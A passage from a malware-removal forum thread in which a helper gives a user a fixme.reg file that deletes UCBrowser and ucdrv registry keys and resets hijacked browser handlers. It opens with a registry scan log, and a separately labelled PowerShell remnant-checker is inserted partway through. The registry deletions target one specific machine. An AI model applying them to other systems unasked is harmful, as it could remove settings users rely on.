@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.CRX\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,4"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.CRX\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.HTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.MHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.MHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.SHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.WEBP\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.WEBP\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\.DEFAULT\Software\Classes\UCHTML.AssocFile.XHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\.DEFAULT\Software\Clients\StartMenuInternet]
@="UCBrowser"
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
@="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0283&subsys_1025091b&rev_1000#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\singlelineouttopo/00010001|\Device\HarddiskVolume6\Program Files (x86)\UCBrowser\Application\UCBrowser.exe%b{00000000-0000-0000-0000-000000000000}"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\http\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\http\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\https\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\https\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\Application]
"AppUserModelId"="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\Application]
"ApplicationIcon"="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,0"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,1"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.CRX\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,4"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.CRX\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.HTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.MHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.MHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTM\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTM\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.SHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.WEBP\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.WEBP\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHT\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHT\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHTML\DefaultIcon]
@="C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe,3"
[HKEY_USERS\S-1-5-18\Software\Classes\UCHTML.AssocFile.XHTML\shell\open\command]
@=""C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1""
[HKEY_USERS\S-1-5-18\Software\Clients\StartMenuInternet]
@="UCBrowser"
[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]

Searching for "ucdrv_repair"
No data found.

-= EOF =-



#10 Pfoertner
  • Topic Starter
  • Members
  • 7 posts

Posted 14 February 2017 - 03:11 PM

But malware is still there ;)



#11 nasdaq
  • Malware Response Team
  • 39,578 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 15 February 2017 - 08:23 AM

We must remove these items from the registry.

Copy the text IN THE QUOTE BOX below to Notepad. Save it as fixme.reg to your desktop.
Be sure the "Save as" type is set to "All files". Once you have saved it, right-click the .reg file and allow it to merge with the registry.
 

Windows Registry Editor Version 5.00

; Syntax reminder: [-Key] deletes the whole key, "Name"=- deletes one value, @=- deletes the key's (Default) value.
; Per-user UCBrowser settings and the UCHTML ProgID it registered for .htm/.html/.crx and similar files.
[-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\17e18612_0]
[-HKEY_CURRENT_USER\Software\UCBrowser]
[-HKEY_CURRENT_USER\Software\Classes\UCHTML]
; Machine-wide browser client registration (native and 32-bit views).
[-HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\UCBrowser]
; Remove only the UCBrowser value here; deleting the whole RegisteredApplications key would unregister every other program's Default Programs entry.
[HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications]
"UCBrowser"=-
[-HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\MediaPlayer\ShimInclusionList\UCBrowser.exe]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\RegisteredApplications]
"UCBrowser"=-
; The ucdrv driver service that AdwCleaner keeps reporting.
[-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ucdrv]
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ucdrv]
; ftp/http/https handlers hijacked in the SYSTEM profile (HKU\.DEFAULT and HKU\S-1-5-18 are the same hive); clearing the per-user (Default) value lets the HKCR handler apply again.
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\ftp\shell\open\command]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\http\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\http\shell\open\command]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\https\DefaultIcon]
@=-
[HKEY_USERS\.DEFAULT\Software\Classes\https\shell\open\command]
@=-
[-HKEY_USERS\.DEFAULT\Software\Classes\UCHTML]
[HKEY_USERS\.DEFAULT\Software\Clients\StartMenuInternet]
@=-
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]
[-HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001\Software\Classes\UCHTML]
[-HKEY_USERS\S-1-5-21-176652477-2876203493-123614037-1001_Classes\UCHTML]
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\DefaultIcon]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\ftp\shell\open\command]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\http\DefaultIcon]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\http\shell\open\command]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\https\DefaultIcon]
@=-
[HKEY_USERS\S-1-5-18\Software\Classes\https\shell\open\command]
@=-
[-HKEY_USERS\S-1-5-18\Software\Classes\UCHTML]
[HKEY_USERS\S-1-5-18\Software\Clients\StartMenuInternet]
@=-
[-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Applications\UCBrowser]


Restart the computer when completed.

You can delete the fixme.reg file when done.
===

Let me know what problems persist with this computer.

There might still be some remnant items but the UCBrowser should be gone.
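One way to check that the merge actually took, as an added example that is not part of nasdaq's fix or of the original thread: the PowerShell script below, run from an elevated prompt after the reboot, walks every loaded hive under HKEY_USERS and re-reads the locations that fixme.reg targets (the ftp/http/https handlers, the StartMenuInternet default, the UCHTML ProgID, the RegisteredApplications values and the ucdrv service) and reports anything still pointing at UCBrowser. Only paths and names that appear in the RogueKiller log and in fixme.reg above are checked; the function name and the output format are this example's own.

```powershell
# Added example (not from the thread): report UCBrowser / ucdrv remnants after merging fixme.reg.
# Run from an elevated PowerShell prompt. Paths checked are the ones named in the log and in fixme.reg.
function Test-UCBrowserRemnants {
    $findings = @()

    # 1. Per-user hives. A handler under HKU\<sid>\Software\Classes overrides HKCR, which is how
    #    UCBrowser captured ftp/http/https for the SYSTEM profile (.DEFAULT and S-1-5-18 are the
    #    same hive, so a remnant there shows up twice).
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        $sid = $hive.PSChildName
        foreach ($proto in 'ftp', 'http', 'https') {
            $key = "Registry::$($hive.Name)\Software\Classes\$proto\shell\open\command"
            if (Test-Path $key) {
                $cmd = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)'
                if ($cmd -and $cmd -match 'UCBrowser') {
                    $findings += "${sid}: $proto handler still runs $cmd"
                }
            }
        }
        $smi = "Registry::$($hive.Name)\Software\Clients\StartMenuInternet"
        if (Test-Path $smi) {
            $def = (Get-ItemProperty -Path $smi -ErrorAction SilentlyContinue).'(default)'
            if ($def -eq 'UCBrowser') { $findings += "${sid}: StartMenuInternet default is still UCBrowser" }
        }
        if (Test-Path "Registry::$($hive.Name)\Software\Classes\UCHTML") {
            $findings += "${sid}: Software\Classes\UCHTML ProgID still present"
        }
    }

    # 2. Machine-wide registration (native and Wow6432Node views).
    foreach ($key in 'HKLM:\SOFTWARE\RegisteredApplications',
                     'HKLM:\SOFTWARE\Wow6432Node\RegisteredApplications') {
        if (Get-ItemProperty -Path $key -Name UCBrowser -ErrorAction SilentlyContinue) {
            $findings += "$key still has a UCBrowser value"
        }
    }
    foreach ($key in 'HKLM:\SOFTWARE\Clients\StartMenuInternet\UCBrowser',
                     'HKLM:\SOFTWARE\Wow6432Node\Clients\StartMenuInternet\UCBrowser') {
        if (Test-Path $key) { $findings += "$key still exists" }
    }

    # 3. The ucdrv driver service: its key, the file its ImagePath names, and the driver object.
    $svc = 'HKLM:\SYSTEM\CurrentControlSet\Services\ucdrv'
    if (Test-Path $svc) {
        $img = (Get-ItemProperty -Path $svc -ErrorAction SilentlyContinue).ImagePath
        $findings += "ucdrv service key still exists (ImagePath: $img)"
        if ($img) {
            # Driver ImagePaths come as \??\C:\..., \SystemRoot\..., or relative to %SystemRoot%.
            $file = $img -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
            if (-not [IO.Path]::IsPathRooted($file)) { $file = Join-Path $env:SystemRoot $file }
            if (Test-Path $file) { $findings += "driver file still on disk: $file" }
        }
    }
    if (Get-CimInstance Win32_SystemDriver -Filter "Name='ucdrv'" -ErrorAction SilentlyContinue) {
        $findings += "ucdrv is still registered as a system driver"
    }

    return $findings
}

$result = Test-UCBrowserRemnants
if ($result) { $result | ForEach-Object { Write-Output "REMNANT: $_" } }
else { Write-Output 'No UCBrowser / ucdrv remnants found in the checked locations.' }
```

If the script still reports the ucdrv key or driver file after the reboot, the .reg merge was most likely run without administrator rights (merging from an elevated prompt with `reg import fixme.reg` avoids that), or the driver is still loaded and re-creating its key; either way that is the detail worth posting back in the thread.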

#12 nasdaq
  • Malware Response Team

Posted 20 February 2017 - 09:11 AM

Are you still with me?

#13 Pfoertner
  • Topic Starter

Posted 21 February 2017 - 10:15 AM

Hello Nasdaq, I am currently not at home but will come back tomorrow! I'll let you know the progress!
